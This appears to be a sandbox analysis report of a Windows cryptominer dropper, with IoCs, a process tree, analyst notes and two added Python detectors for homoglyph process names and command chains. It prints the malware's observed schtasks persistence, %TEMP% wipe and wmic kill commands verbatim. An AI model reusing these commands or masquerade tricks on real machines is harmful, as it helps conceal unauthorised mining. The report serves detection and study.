Analysis

  max time kernel:   72s
  max time network:  118s
  platform:          windows10-2004_x64
  resource:          win10v2004-en-20220113
  submitted:         21/03/2022, 20:22

  Static task:       static1
  Behavioral task:   behavioral1
  Sample:            SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
  Resource:          win7-20220311-en

General

  Target:  SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
  Size:    7.7MB
  MD5:     7bf3a72a5287c6388cda810822c894a3
  SHA1:    4c23e414457d18ceee367a19afbe0c51588c3df0
  SHA256:  7ae4237b70f7233f779dbcde9db944e13472a1c4097baa4a17f5e769e0869476
  SHA512:  014fa7d7ead618cdbead06ec8658b7c41baba40d1954358065b28f0eab824028a4b34263d187ed332a0e40b5e6bba64b027bf6cfadf638b0924ae96aba00d9c9
Malware Config
Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)  (2 TTPs)

Executes dropped EXE  (5 IoCs)
  pid   Process
  1460  Win32WebViewHost.exe
  4720  WmіPrvSE.exe
  3452  RuntіmeBroker.exe
  3708  dismhost.exe
  400   HxTsr.exe

  Note the names. Win32WebViewHost.exe, WmiPrvSE.exe, RuntimeBroker.exe and HxTsr.exe are all genuine Windows binaries, but here they run from %TEMP% and from AppData\Local\Packages (see the process tree). The "і" in WmіPrvSE.exe and RuntіmeBroker.exe is not ASCII; it is a Cyrillic look-alike (almost certainly U+0456), so a plain string match on "WmiPrvSE.exe" or "RuntimeBroker.exe" will not hit these names. dismhost.exe is the one expected entry: the genuine cleanmgr.exe spawns it from a %TEMP%\{GUID} directory as part of Disk Cleanup's normal operation.
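The five dropped executables above borrow the names of genuine Windows binaries, two of them with a Cyrillic letter in place of the Latin i. The script below is an added example, not part of this report or of any vendor tooling: given the image paths from the process tree later in the report, it folds a small (illustrative, incomplete) confusables map, reports the non-ASCII code points in the file name, and flags a known system-binary name that executes outside its expected directory. The expected-directory table and the assumption that the look-alike letter is U+0456 are the author's, not the report's.

```python
"""Masquerade check for the dropped executables in this report.

Added example, not part of the sandbox report or of any vendor tooling. It takes
an image path and reports (1) non-ASCII look-alike characters in the file name
and (2) a well-known Windows binary name executing from a directory where the
genuine binary never lives. The look-alike map and the expected-directory table
are illustrative and deliberately small.
"""
import ntpath
import unicodedata

# Assumption: the dotted i in the report's WmіPrvSE.exe / RuntіmeBroker.exe is
# U+0456 (CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I). Partial map of
# Cyrillic and Greek letters that render like Latin ones.
CONFUSABLES = {
    "\u0456": "i", "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0458": "j",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X", "\u03bf": "o", "\u0391": "A", "\u0392": "B", "\u0395": "E",
}

# Where the genuine binary lives on Windows 10 (illustrative, not exhaustive).
# Keys are the folded, lower-cased file name; values are directory prefixes.
EXPECTED_DIRS = {
    "wmiprvse.exe": (r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"),
    "runtimebroker.exe": (r"c:\windows\system32",),
    "win32webviewhost.exe": (r"c:\windows\system32",),
    "hxtsr.exe": (r"c:\program files\windowsapps",),
    "cleanmgr.exe": (r"c:\windows\system32",),
    "schtasks.exe": (r"c:\windows\system32",),
}


def fold_confusables(name: str) -> str:
    """Replace known look-alike code points with their Latin equivalents."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in name)


def analyze_image_path(path: str) -> dict:
    """Classify one image path; 'findings' is empty for an unremarkable path."""
    directory, name = ntpath.split(path)
    non_ascii = [(ch, "U+%04X" % ord(ch), unicodedata.name(ch, "?"))
                 for ch in name if ord(ch) > 0x7F]
    looks_like = fold_confusables(name).lower()
    findings = []
    if non_ascii:
        findings.append("homoglyph")        # file name is not plain ASCII
    expected = EXPECTED_DIRS.get(looks_like)
    if expected is not None:
        d = directory.lower()
        if not any(d == e or d.startswith(e + "\\") for e in expected):
            findings.append("masquerade")   # known name, wrong directory
    return {"name": name, "looks_like": looks_like,
            "non_ascii": non_ascii, "findings": findings}


def scan(paths):
    """Return only the paths that produced at least one finding."""
    results = [analyze_image_path(p) for p in paths]
    return [r for r in results if r["findings"]]


# Image paths taken from the process tree of this report; the Cyrillic letter is
# inserted explicitly so the sample does not depend on how the page was copied.
I_CYR = "\u0456"
PKG = r"C:\Users\Admin\AppData\Local\Packages"
SAMPLE_PATHS = [
    r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe",
    PKG + r"\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex"
          r"\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\Wm" + I_CYR + "PrvSE.exe",
    PKG + r"\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState"
          r"\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\Runt" + I_CYR + "meBroker.exe",
    PKG + r"\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex"
          r"\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe",
    r"C:\Windows\System32\cleanmgr.exe",          # genuine, must not be flagged
    r"C:\Windows\System32\wbem\WmiPrvSE.exe",     # genuine, must not be flagged
]

if __name__ == "__main__":
    for r in scan(SAMPLE_PATHS):
        print(r["findings"], r["name"], "->", r["looks_like"], r["non_ascii"])
```

Folding before the directory lookup is what makes the check work: without it "WmіPrvSE.exe" never matches a table key and the wrong-directory test is skipped. Run as a script it prints the four flagged paths; the two genuine System32 paths produce nothing.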
Checks BIOS information in registry  (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  description        ioc                                                              Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  WmіPrvSE.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   WmіPrvSE.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  HxTsr.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   HxTsr.exe
Checks computer location settings  (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  description        ioc                                                                                                    Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  Win32WebViewHost.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  RuntіmeBroker.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  WmіPrvSE.exe
Loads dropped DLL  (9 IoCs)
  pid   Process       hits
  3708  dismhost.exe  4
  400   HxTsr.exe     5
Reads user/profile data of web browsers  (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials. The report lists no IoC for this signature.
Adds Run key to start application  (2 TTPs, 2 IoCs)
  description      ioc                                                                   Process
  Key created      \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce   SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""   SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe

  This RunOnce value is not the sample's persistence. wextract_cleanupN entries that call advpack.dll,DelNodeRunDLL32 are written by the Windows IExpress/wextract self-extractor (IXP000.TMP is its extraction folder) and only delete that folder at the next logon. The persistence in this run is the pair of scheduled tasks created by Win32WebViewHost.exe; see "Creates scheduled task(s)" and the process tree.

Checks whether UAC is enabled  (2 IoCs)
  description        ioc                                                                                    Process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  WmіPrvSE.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  HxTsr.exe
Drops file in System32 directory  (8 IoCs)
  description                   ioc                                                  Process
  File opened for modification  C:\Windows\system32\vcruntime140_1.dll               WmіPrvSE.exe
  File opened for modification  C:\Windows\System32\LOG                              HxTsr.exe
  File opened for modification  C:\Windows\system32\LogFiles\setupcln\setuperr.log   cleanmgr.exe
  File opened for modification  C:\Windows\system32\LogFiles\setupcln\diagerr.xml    cleanmgr.exe
  File opened for modification  C:\Windows\system32\LogFiles\setupcln\diagwrn.xml    cleanmgr.exe
  File opened for modification  C:\Windows\system32\LogFiles\setupcln\setupact.log   cleanmgr.exe
  File opened for modification  C:\Windows\system32\msvcp140.dll                     WmіPrvSE.exe
  File opened for modification  C:\Windows\system32\vcruntime140.dll                 WmіPrvSE.exe

  The three WmіPrvSE.exe entries are the Visual C++ (v140) runtime DLLs msvcp140, vcruntime140 and vcruntime140_1; placing them in System32 makes them resolvable by any later process, most likely the dropped miner that "Loads dropped DLL" five times. The cleanmgr.exe entries are Disk Cleanup's own log files and are expected for a cleanmgr.exe /setup run.

Drops file in Windows directory  (2 IoCs)
  description                   ioc                            Process
  File opened for modification  C:\Windows\Logs\DISM\dism.log  cleanmgr.exe
  File opened for modification  C:\Windows\Logs\DISM\dism.log  dismhost.exe
Enumerates physical storage devices  (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The report labels this "likely ransomware behaviour"; in this run the only drive enumeration recorded is cleanmgr.exe's (next signature) and the report shows no file-encryption activity, so that reading is not supported here.

Checks SCSI registry key(s)  (3 TTPs, 18 IoCs)
SCSI information is often read in order to detect sandboxing environments. Every hit below is from cleanmgr.exe (Disk Cleanup, launched by RuntіmeBroker.exe with /setup), which enumerates drives as part of its normal operation, so this signature does not implicate the dropped binaries themselves.
  description        ioc                                                                                                                                                    Process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005   cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\  cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs                                                 cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000                                                         cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags                                              cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000                                                              cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags                                                   cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005        cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\       cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID                                               cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004   cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs                                            cleanmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID                                                    cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015   cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015        cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014   cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004        cleanmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014        cleanmgr.exe
Creates scheduled task(s)  (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  2496  schtasks.exe
  2660  schtasks.exe
  Both tasks are created with /sc MINUTE /mo 1 /f, i.e. they re-launch the copied WmіPrvSE.exe and RuntіmeBroker.exe every minute, and the task names (/tn) carry the same Cyrillic і as the file names.

Kills process with WMI  (2 IoCs)
  pid   Process
  1656  WMIC.exe
  1396  WMIC.exe
  The filters are ExecutablePath LIKE '%TEMP\\%' and ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%': the running copy terminates anything still executing from %TEMP% (where the IXP000.TMP extraction stage lives) and from an %APPDATA%\Sysfiles directory that no process in this run uses, presumably an earlier install location, before those directories are wiped.

Runs ping.exe  (1 TTPs, 5 IoCs)
  pid   Process
  2164  PING.EXE
  1460  PING.EXE
  4088  PING.EXE
  4032  PING.EXE
  2300  PING.EXE
  Every ping targets 127.0.0.1 with -n 1, 2, 4 or 10. This is the usual cmd.exe sleep idiom, used here to space out the copy, the wipe and the kill commands.
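Taken together, the three signatures above describe one procedure that the process tree records in full: schtasks registers a one-minute task, ping against 127.0.0.1 is used as a delay, xcopy stages the copies under AppData\Local\Packages, erase/rd wipes %TEMP% and %APPDATA%\Sysfiles, and wmic terminates whatever still runs from those paths. The script below is an added example (not part of the report or of any vendor tooling) that splits each recorded cmd.exe /C chain on & and && outside double quotes and labels every command; the command lines from the process tree are embedded as constructed sample input. The rule names, the detail fields and the assumption that the look-alike letter is U+0456 are the author's.

```python
"""Classify the cmd.exe / schtasks command lines recorded in this report.

Added example, not part of the sandbox report. split_chain() breaks a
cmd.exe /C line on & and && outside double quotes; classify() labels each
command as the ping-to-localhost sleep idiom, an xcopy staging copy, a
%TEMP%/staging wipe, a WMI process kill, or a schtasks persistence entry.
"""
import re

# Leading  "cmd.exe" /C  (optionally with a full path to cmd.exe)
CMD_PREFIX = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[cCkK]\s+')

RULES = [
    ("sleep", re.compile(r"^ping\s+-n\s+(?P<count>\d+)\s+127\.0\.0\.1", re.I)),
    ("stage_copy", re.compile(r"^xcopy\b", re.I)),
    ("wipe", re.compile(r"^(?:erase|del|rd|rmdir)\s+(?:/\S+\s+)*(?P<target>[^/\s]\S*)", re.I)),
    ("wmi_kill", re.compile(r"^wmic\s+process\s+where\s+(?P<filter>.+?)\s+"
                            r"(?P<verb>call\s+terminate|delete)\s*$", re.I)),
    ("schtask", re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)),
]


def split_chain(cmdline: str) -> list:
    """Strip the cmd.exe /C prefix and split on & / && outside double quotes."""
    body = CMD_PREFIX.sub("", cmdline, count=1)
    parts, buf, in_quotes, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "&" and not in_quotes:
            parts.append("".join(buf).strip())
            buf = []
            if body[i + 1:i + 2] == "&":      # treat && as one separator
                i += 1
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def classify(cmd: str) -> tuple:
    """Return (kind, detail) for a single command."""
    for kind, rx in RULES:
        m = rx.search(cmd)
        if not m:
            continue
        if kind == "sleep":
            return kind, {"pings": int(m["count"]), "output_redirected": ">" in cmd}
        if kind == "stage_copy":
            quoted = re.findall(r'"([^"]*)"', cmd)
            dest = quoted[-1] if quoted else ""
            return kind, {"dest": dest,
                          "into_packages": "\\appdata\\local\\packages\\" in dest.lower()}
        if kind == "wipe":
            t = m["target"]
            return kind, {"target": t,
                          "temp_or_staging": any(k in t.lower() for k in ("%temp%", "sysfiles"))}
        if kind == "wmi_kill":
            return kind, {"filter": m["filter"], "verb": m["verb"].lower()}
        sc = re.search(r"/sc\s+(\w+)", cmd, re.I)
        mo = re.search(r"/mo\s+(\d+)", cmd, re.I)
        tn = re.search(r'/tn\s+"([^"]+)"', cmd, re.I)
        tr = re.search(r'/tr\s+"([^"]+)"', cmd, re.I)
        sched = sc.group(1).lower() if sc else ""
        task = tn.group(1) if tn else ""
        return kind, {"schedule": sched, "modifier": int(mo.group(1)) if mo else None,
                      "task": task, "action": tr.group(1) if tr else "",
                      "every_minute": sched == "minute" and mo is not None and int(mo.group(1)) == 1,
                      "non_ascii_task_name": any(ord(c) > 0x7F for c in task)}
    return "other", {"cmd": cmd}


def triage_cmdline(cmdline: str) -> list:
    """Classify every command in one recorded command line."""
    return [classify(c) for c in split_chain(cmdline)]


# Command lines copied from the process tree of this report. {I} marks the
# Cyrillic letter i (assumed U+0456) in the look-alike names.
I_CYR = "\u0456"
SAMPLE_CMDLINES = [s.replace("{I}", I_CYR) for s in (
    r'''"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Wm{I}PrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\Wm{I}PrvSE.exe" /f''',
    r'''"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "Wm{I}PrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q''',
    r'''"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate''',
    r'''"cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%''',
    r'''"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles''',
)]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for kind, detail in triage_cmdline(line):
            print(kind, detail)
```

The quote-aware splitter matters because a staging path may legitimately contain "&"; a naive split on "&" would break such a command in two. A rule that fires on the combination sleep + stage_copy into Packages + wipe of %TEMP% in a single chain, or on a schtask with every_minute and non_ascii_task_name both set, is far more specific than any one of the signatures above on its own.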
Suspicious behavior: EnumeratesProcesses  (64 IoCs)
  pid   Process
  1460  Win32WebViewHost.exe  (the same pid/process pair is listed 64 times)

Suspicious behavior: LoadsDriver  (1 IoCs)
  pid  Process
  648  Process not Found
Suspicious use of AdjustPrivilegeToken  (64 IoCs)
  pid   Process               Token(s)
  1460  Win32WebViewHost.exe  SeDebugPrivilege
  3452  RuntіmeBroker.exe     SeDebugPrivilege
  4720  WmіPrvSE.exe          SeDebugPrivilege
  3492  WMIC.exe              SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36  (the full list appears twice)
  208   cleanmgr.exe          SeManageVolumePrivilege  (8 times)
  1656  WMIC.exe              SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege  (cut short by the report's 64-entry cap)

  The numeric entries 33 to 36 are privilege LUIDs the report did not resolve to names: SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36). The long WMIC.exe lists are wmic's normal start-up behaviour of enabling every privilege in its token and carry little signal; the rows worth keeping are the three dropped executables each requesting SeDebugPrivilege.
Suspicious use of FindShellTrayWindow  (1 IoCs)
  pid  Process
  400  HxTsr.exe

Suspicious use of WriteProcessMemory  (50 IoCs)
The report lists each pair twice (50 entries for 25 distinct writes). Every writer/target pair is a parent/child edge of the process tree, i.e. these are the memory writes that accompany ordinary process creation, not injection into an unrelated process. Note that PID 1460 is reused: it is Win32WebViewHost.exe early in the run (procid 79) and a PING.EXE under cmd.exe 4040 later (procid 123).
  pid   Process                                            wrote to  procid_target
  1380  SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe  1460      79
  1460  Win32WebViewHost.exe                               2496      81
  1460  Win32WebViewHost.exe                               2660      83
  1460  Win32WebViewHost.exe                               3128      86
  1460  Win32WebViewHost.exe                               3304      85
  3128  cmd.exe                                            4088      89
  3304  cmd.exe                                            4032      90
  3128  cmd.exe                                            4016      91
  3304  cmd.exe                                            4592      92
  3304  cmd.exe                                            2300      93
  3452  RuntіmeBroker.exe                                  208       105
  208   cleanmgr.exe                                       3708      106
  4720  WmіPrvSE.exe                                       1408      108
  4720  WmіPrvSE.exe                                       3468      109
  4720  WmіPrvSE.exe                                       424       110
  424   cmd.exe                                            2164      114
  3468  cmd.exe                                            3492      115
  4720  WmіPrvSE.exe                                       2360      120
  4720  WmіPrvSE.exe                                       3964      116
  4720  WmіPrvSE.exe                                       4040      118
  2360  cmd.exe                                            1656      122
  4040  cmd.exe                                            1460      123
  1408  cmd.exe                                            1396      124
  3964  cmd.exe                                            3032      125
  4720  WmіPrvSE.exe                                       400       126
Processes

Reading the tree: the sample is an IExpress/wextract self-extractor that unpacks to %TEMP%\IXP000.TMP and runs Win32WebViewHost.exe. That stage copies WmіPrvSE.exe and RuntіmeBroker.exe into two AppData\Local\Packages\...\LocalState folders (named to resemble Windows Search's ConstraintIndex\Input_{GUID} directories) and registers a one-minute scheduled task for each. The two top-level WmіPrvSE.exe and RuntіmeBroker.exe entries have no parent in the tree, consistent with being started by the Task Scheduler rather than by the dropper. WmіPrvSE.exe then wipes %TEMP% and %APPDATA%\Sysfiles, kills anything still running from those paths, and starts HxTsr.exe with a command line matching XMRig's options (pool gulf.moneroocean.stream:20128 over TLS, a 95-character Monero address as the user, one thread). RuntіmeBroker.exe runs cleanmgr.exe /setup, which accounts for the cleanmgr.exe and dismhost.exe rows. PID 1460 is reused: Win32WebViewHost.exe early in the run, a PING.EXE under cmd.exe 4040 later.

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe  (PID 1380)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe  (PID 1460)
    cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\schtasks.exe  (PID 2496)
      cmdline: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "WmіPrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe" /f
      - Creates scheduled task(s)

    C:\Windows\System32\schtasks.exe  (PID 2660)
      cmdline: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "RuntіmeBroker" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe" /f
      - Creates scheduled task(s)

    C:\Windows\SYSTEM32\cmd.exe  (PID 3304)
      cmdline: "cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\PING.EXE  (PID 4032)
        cmdline: ping -n 1 127.0.0.1
        - Runs ping.exe

      C:\Windows\system32\xcopy.exe  (PID 4592)
        cmdline: xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\"

      C:\Windows\system32\PING.EXE  (PID 2300)
        cmdline: ping -n 4 127.0.0.1
        - Runs ping.exe

    C:\Windows\SYSTEM32\cmd.exe  (PID 3128)
      cmdline: "cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\PING.EXE  (PID 4088)
        cmdline: ping -n 1 127.0.0.1
        - Runs ping.exe

      C:\Windows\system32\xcopy.exe  (PID 4016)
        cmdline: xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe  (PID 4720)
  cmdline: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe  (PID 1408)
    cmdline: "cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\WMIC.exe  (PID 1396)
      cmdline: wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
      - Kills process with WMI

  C:\Windows\system32\cmd.exe  (PID 3468)
    cmdline: "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\WMIC.exe  (PID 3492)
      cmdline: wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe  (PID 424)
